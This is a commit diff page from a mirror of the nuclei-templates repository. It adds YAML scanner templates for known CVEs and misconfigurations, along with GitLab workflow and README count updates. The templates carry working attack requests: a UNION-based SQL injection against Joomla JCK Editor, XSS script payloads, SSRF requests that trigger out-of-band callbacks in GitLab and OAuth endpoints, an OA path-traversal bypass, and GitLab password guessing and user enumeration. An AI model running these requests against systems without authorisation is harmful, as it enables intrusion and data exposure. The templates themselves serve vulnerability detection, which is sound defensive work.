daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
Noam Rathaus 2021-06-20 13:56:54 +03:00
parent 01b77a7ed2 1d98d72476
commit bb6fa66dd9
20 changed files with 548 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 344 | vulnerabilities | 183 | exposed-panels | 150 |
| takeovers | 67 | exposures | 107 | technologies | 103 |
| misconfiguration | 68 | workflows | 32 | miscellaneous | 24 |
| default-logins | 30 | file | 42 | dns | 10 |
| cves | 349 | vulnerabilities | 184 | exposed-panels | 150 |
| takeovers | 67 | exposures | 107 | technologies | 105 |
| misconfiguration | 70 | workflows | 32 | miscellaneous | 24 |
| default-logins | 31 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 13 |
**118 directories, 1298 files**.
**119 directories, 1311 files**.
</td>
</tr>

24
cves/2017/CVE-2017-15944.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2017-15944
info:
name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab
reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
tags: cve,cve2017,rce,vpn,paloalto
requests:
- method: GET
path:
- "{{BaseURL}}/global-protect/portal/css/login.css"
matchers-condition: and
matchers:
- type: word
words:
- "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
part: header
- type: status
status:
- 200

22
cves/2018/CVE-2018-17254.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2018-17254
info:
name: Joomla JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: high
tags: joomla,sqli,cve,cve2018
requests:
- raw:
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
matchers:
- type: word
part: body
words:
- "nuclei-template"

5
cves/2018/CVE-2018-18069.yaml
View File

@ -11,9 +11,10 @@ requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'

30
cves/2020/CVE-2020-25495.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-25495
info:
name: SCO Openserver 5.0.7 - 'section' Reflected XSS
author: 0x_Akoko
description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
severity: medium
tags: cve,cve2020,sco,xss
reference: https://www.exploit-db.com/exploits/49300
requests:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
part: body
- type: word
words:
- "text/html"
part: header

2
cves/2021/CVE-2021-21975.yaml
View File

@ -5,7 +5,7 @@ info:
author: luci
severity: critical
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
tags: cve,cve2021,ssrf,vmware
tags: cve,cve2021,ssrf,vmware,vrealize
reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
requests:

30
cves/2021/CVE-2021-22214.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-22214
info:
author: Suman_Kar
name: Unauthenticated Gitlab SSRF - CI Lint API
severity: medium
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob
requests:
- raw:
- |
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
content-type: application/json
Connection: close
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

30
cves/2021/CVE-2021-28854.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-28854
info:
name: VICIdial - Multiple sensitive Information disclosure
author: pdteam
severity: high
description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21
reference: https://github.com/JHHAX/VICIdial
tags: cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/agc/vicidial_mysqli_errors.txt"
matchers-condition: and
matchers:
- type: word
words:
- 'text/plain'
part: header
- type: status
status:
- 200
- type: word
words:
- 'vdc_db_query'
part: body

55
default-logins/gitlab/gitlab-weak-login.yaml Normal file
View File

@ -0,0 +1,55 @@
id: gitlab-weak-login
info:
name: Gitlab Weak Login
author: Suman_Kar
severity: high
tags: gitlab,default-login
# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
requests:
- payloads:
gitlab_password:
- 12345
- 123456789
gitlab_user:
- 1234
- admin
# Enumerate valid user.
attack: clusterbomb
raw:
- |
POST /oauth/token HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
content-type: application/json
Connection: close
{"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- application/json
- type: word
part: body
words:
- '"access_token":'
- '"token_type":'
- '"refresh_token":'
condition: and

6
exposed-panels/grafana-detect.yaml
View File

@ -15,3 +15,9 @@ requests:
words:
- "<title>Grafana</title>"
part: body
extractors:
- type: regex
part: body
group: 1
regex:
- 'Grafana ([v0-9.]+)'

24
headless/extract-urls.yaml Normal file
View File

@ -0,0 +1,24 @@
id: extract-urls
info:
name: Extract URLs from HTML attributes
author: dwisiswant0
severity: info
tags: headless,extractor
headless:
- steps:
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: extract
args:
code: |
'\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
extractors:
- type: kval
part: extract
kval:
- extract

1
misconfiguration/aem/aem-hash-querybuilder.yaml
View File

@ -30,3 +30,4 @@ requests:
words:
- '"success":true'
- 'rep:password'
condition: and

3
misconfiguration/aem/aem-jcr-querybuilder.yaml
View File

@ -28,4 +28,5 @@ requests:
- type: word
words:
- '"success":true'
- 'jcr:uuid'
- 'jcr:uuid'
condition: and

35
misconfiguration/ssrf-via-oauth-misconfig.yaml Normal file
View File

@ -0,0 +1,35 @@
id: ssrf-via-oauth-misconfig
info:
name: SSRF due to misconfiguration in OAuth
author: KabirSuda
severity: medium
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
tags: misconfig,oob,oauth
reference: https://portswigger.net/research/hidden-oauth-attack-vectors
requests:
- raw:
- |
POST /connect/register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Language: en-US,en;q=0.9
Connection: close
{
"application_type": "web",
"redirect_uris": ["https://{{interactsh-url}}/callback"],
"client_name": "{{Hostname}}",
"logo_uri": "https://{{interactsh-url}}/favicon.ico",
"subject_type": "pairwise",
"token_endpoint_auth_method": "client_secret_basic",
"request_uris": ["https://{{interactsh-url}}"]
}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

31
misconfiguration/zhiyuan-oa-unauthorized.yaml Normal file
View File

@ -0,0 +1,31 @@
id: zhiyuan-oa-unauthorized
info:
name: Zhiyuan Oa Unauthorized
author: pikpikcu
severity: low
reference: https://buaq.net/go-53721.html
tags: seeyon,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile"
matchers-condition: and
matchers:
- type: word
words:
- "serverIdentifier"
- "companyName"
condition: and
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200

145
network/openssh-username-enumeration.yaml Normal file
View File

@ -0,0 +1,145 @@
id: openssh-username-enumeration
info:
name: OpenSSH 2.3 < 7.7 Detection
author: r3dg33k
severity: medium
tags: network,openssh
description: OpenSSH 2.3 < 7.7 is vulnerable to username enumeration
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-2.0-OpenSSH_7.6"
- "SSH-2.0-OpenSSH_7.6p1"
- "SSH-2.0-OpenSSH_7.5"
- "SSH-2.0-OpenSSH_7.5p1"
- "SSH-2.0-OpenSSH_7.4"
- "SSH-2.0-OpenSSH_7.4p1"
- "SSH-2.0-OpenSSH_7.3"
- "SSH-2.0-OpenSSH_7.3p1"
- "SSH-2.0-OpenSSH_7.2p2"
- "SSH-2.0-OpenSSH_7.2"
- "SSH-2.0-OpenSSH_7.2p1"
- "SSH-2.0-OpenSSH_7.1p2"
- "SSH-2.0-OpenSSH_7.1"
- "SSH-2.0-OpenSSH_7.1p1"
- "SSH-2.0-OpenSSH_7.0"
- "SSH-2.0-OpenSSH_7.0p1"
- "SSH-2.0-OpenSSH_6.9"
- "SSH-2.0-OpenSSH_6.9p1"
- "SSH-2.0-OpenSSH_6.8"
- "SSH-2.0-OpenSSH_6.8p1"
- "SSH-2.0-OpenSSH_6.7"
- "SSH-2.0-OpenSSH_6.7p1"
- "SSH-2.0-OpenSSH_6.6"
- "SSH-2.0-OpenSSH_6.6p1"
- "SSH-2.0-OpenSSH_6.5"
- "SSH-2.0-OpenSSH_6.5p1"
- "SSH-2.0-OpenSSH_6.4"
- "SSH-2.0-OpenSSH_6.4p1"
- "SSH-2.0-OpenSSH_6.3"
- "SSH-2.0-OpenSSH_6.3p1"
- "SSH-2.0-OpenSSH_6.2p2"
- "SSH-2.0-OpenSSH_6.2"
- "SSH-2.0-OpenSSH_6.2p1"
- "SSH-2.0-OpenSSH_6.1"
- "SSH-2.0-OpenSSH_6.1p1"
- "SSH-2.0-OpenSSH_6.0"
- "SSH-2.0-OpenSSH_6.0p1"
- "SSH-2.0-OpenSSH_5.9"
- "SSH-2.0-OpenSSH_5.9p1"
- "SSH-2.0-OpenSSH_5.8p2"
- "SSH-2.0-OpenSSH_5.8"
- "SSH-2.0-OpenSSH_5.8p1"
- "SSH-2.0-OpenSSH_5.7"
- "SSH-2.0-OpenSSH_5.7p1"
- "SSH-2.0-OpenSSH_5.6"
- "SSH-2.0-OpenSSH_5.6p1"
- "SSH-2.0-OpenSSH_5.5"
- "SSH-2.0-OpenSSH_5.5p1"
- "SSH-2.0-OpenSSH_5.4"
- "SSH-2.0-OpenSSH_5.4p1"
- "SSH-2.0-OpenSSH_5.3"
- "SSH-2.0-OpenSSH_5.3p1"
- "SSH-2.0-OpenSSH_5.2"
- "SSH-2.0-OpenSSH_5.2p1"
- "SSH-2.0-OpenSSH_5.1"
- "SSH-2.0-OpenSSH_5.1p1"
- "SSH-2.0-OpenSSH_5.0"
- "SSH-2.0-OpenSSH_5.0p1"
- "SSH-2.0-OpenSSH_4.9"
- "SSH-2.0-OpenSSH_4.9p1"
- "SSH-2.0-OpenSSH_4.8"
- "SSH-2.0-OpenSSH_4.8p1"
- "SSH-2.0-OpenSSH_4.6"
- "SSH-2.0-OpenSSH_4.6p1"
- "SSH-2.0-OpenSSH_4.7"
- "SSH-2.0-OpenSSH_4.7p1"
- "SSH-2.0-OpenSSH_4.5"
- "SSH-2.0-OpenSSH_4.5p1"
- "SSH-2.0-OpenSSH_4.4"
- "SSH-2.0-OpenSSH_4.4p1"
- "SSH-2.0-OpenSSH_4.3p2"
- "SSH-2.0-OpenSSH_4.3"
- "SSH-2.0-OpenSSH_4.3p1"
- "SSH-2.0-OpenSSH_4.2"
- "SSH-2.0-OpenSSH_4.2p1"
- "SSH-2.0-OpenSSH_4.1"
- "SSH-2.0-OpenSSH_4.1p1"
- "SSH-2.0-OpenSSH_4.0"
- "SSH-2.0-OpenSSH_4.0p1"
- "SSH-2.0-OpenSSH_3.9"
- "SSH-2.0-OpenSSH_3.9p1"
- "SSH-2.0-OpenSSH_3.8.1p1"
- "SSH-2.0-OpenSSH_3.8"
- "SSH-2.0-OpenSSH_3.8p1"
- "SSH-2.0-OpenSSH_3.7.1p2"
- "SSH-2.0-OpenSSH_3.7.1"
- "SSH-2.0-OpenSSH_3.7.1p1"
- "SSH-2.0-OpenSSH_3.7"
- "SSH-2.0-OpenSSH_3.7p1"
- "SSH-2.0-OpenSSH_3.6.1p2"
- "SSH-2.0-OpenSSH_3.6.1"
- "SSH-2.0-OpenSSH_3.6.1p1"
- "SSH-2.0-OpenSSH_3.6"
- "SSH-2.0-OpenSSH_3.6p1"
- "SSH-2.0-OpenSSH_3.5"
- "SSH-2.0-OpenSSH_3.5p1"
- "SSH-2.0-OpenSSH_3.4"
- "SSH-2.0-OpenSSH_3.4p1"
- "SSH-2.0-OpenSSH_3.3"
- "SSH-2.0-OpenSSH_3.3p1"
- "SSH-2.0-OpenSSH_3.2.3"
- "SSH-2.0-OpenSSH_3.2.3p1"
- "SSH-2.0-OpenSSH_3.2.2"
- "SSH-2.0-OpenSSH_3.2.2p1"
- "SSH-2.0-OpenSSH_3.1"
- "SSH-2.0-OpenSSH_3.1p1"
- "SSH-2.0-OpenSSH_3.0.2"
- "SSH-2.0-OpenSSH_3.0.2p1"
- "SSH-2.0-OpenSSH_3.0p1"
- "SSH-2.0-OpenSSH_3.0.1"
- "SSH-2.0-OpenSSH_3.0.1p1"
- "SSH-2.0-OpenSSH_3.0"
- "SSH-2.0-OpenSSH_3.0p1"
- "SSH-2.0-OpenSSH_2.9p2"
- "SSH-2.0-OpenSSH_2.9.9"
- "SSH-2.0-OpenSSH_2.9.9p1"
- "SSH-2.0-OpenSSH_2.9"
- "SSH-2.0-OpenSSH_2.9p1"
- "SSH-2.0-OpenSSH_2.5.2p2"
- "SSH-2.0-OpenSSH_2.5.1p2"
- "SSH-2.0-OpenSSH_2.5.1p1"
- "SSH-2.0-OpenSSH_2.3.0p1"
- "SSH-2.0-OpenSSH_2.5.2p2"
- "SSH-2.0-OpenSSH_2.5.1p2"
- "SSH-2.0-OpenSSH_2.5.1p1"
- "SSH-2.0-OpenSSH_2.3.0p1"
- "SSH-2.0-OpenSSH_2.3"

21
technologies/detect-sentry.yaml Normal file
View File

@ -0,0 +1,21 @@
id: detect-sentry
info:
name: Detect Sentry Instance
author: Sicksec
severity: info
tags: ssrf,sentry,tech
reference: |
- https://hackerone.com/reports/374737
- https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"

36
technologies/vmware-vrealize-detect.yaml Normal file
View File

@ -0,0 +1,36 @@
id: vmware-vrealize
info:
name: VMware vRealize
author: milo2012
severity: info
description: Version of VMware vRealize Operations Manager
tags: vmware,vrealize
requests:
- method: GET
path:
- "{{BaseURL}}/ui/login.action"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- text/html
part: header
- type: word
words:
- '<title>vRealize Operations Manager</title>'
part: body
extractors:
- type: regex
part: body
group: 1
regex:
- "SessionProvider.js\\?version=([0-9.]+)"

42
vulnerabilities/gitlab/gitlab-user-open-api.yaml Normal file
View File

@ -0,0 +1,42 @@
id: gitlab-user-open-api
info:
author: Suman_Kar
name: GitLab - User Information Disclosure Via Open API
severity: medium
tags: gitlab,disclosure,fuzz
reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158
requests:
- payloads:
uid: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
raw:
- |
GET /api/v4/users/{{uid}} HTTP/1.1
Host: {{Hostname}}
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
Connection: keep-alive
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "username.*"
- "id.*"
- "name.*"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

6
workflows/gitlab-workflow.yaml
View File

@ -10,4 +10,8 @@ workflows:
- template: exposed-panels/gitlab-detect.yaml
subtemplates:
- template: misconfiguration/gitlab/
- template: misconfiguration/gitlab/
- template: vulnerabilities/gitlab/
- template: cves/2020/CVE-2020-2096.yaml
- template: cves/2021/CVE-2021-22214.yaml
- template: default-logins/gitlab/gitlab-weak-login.yaml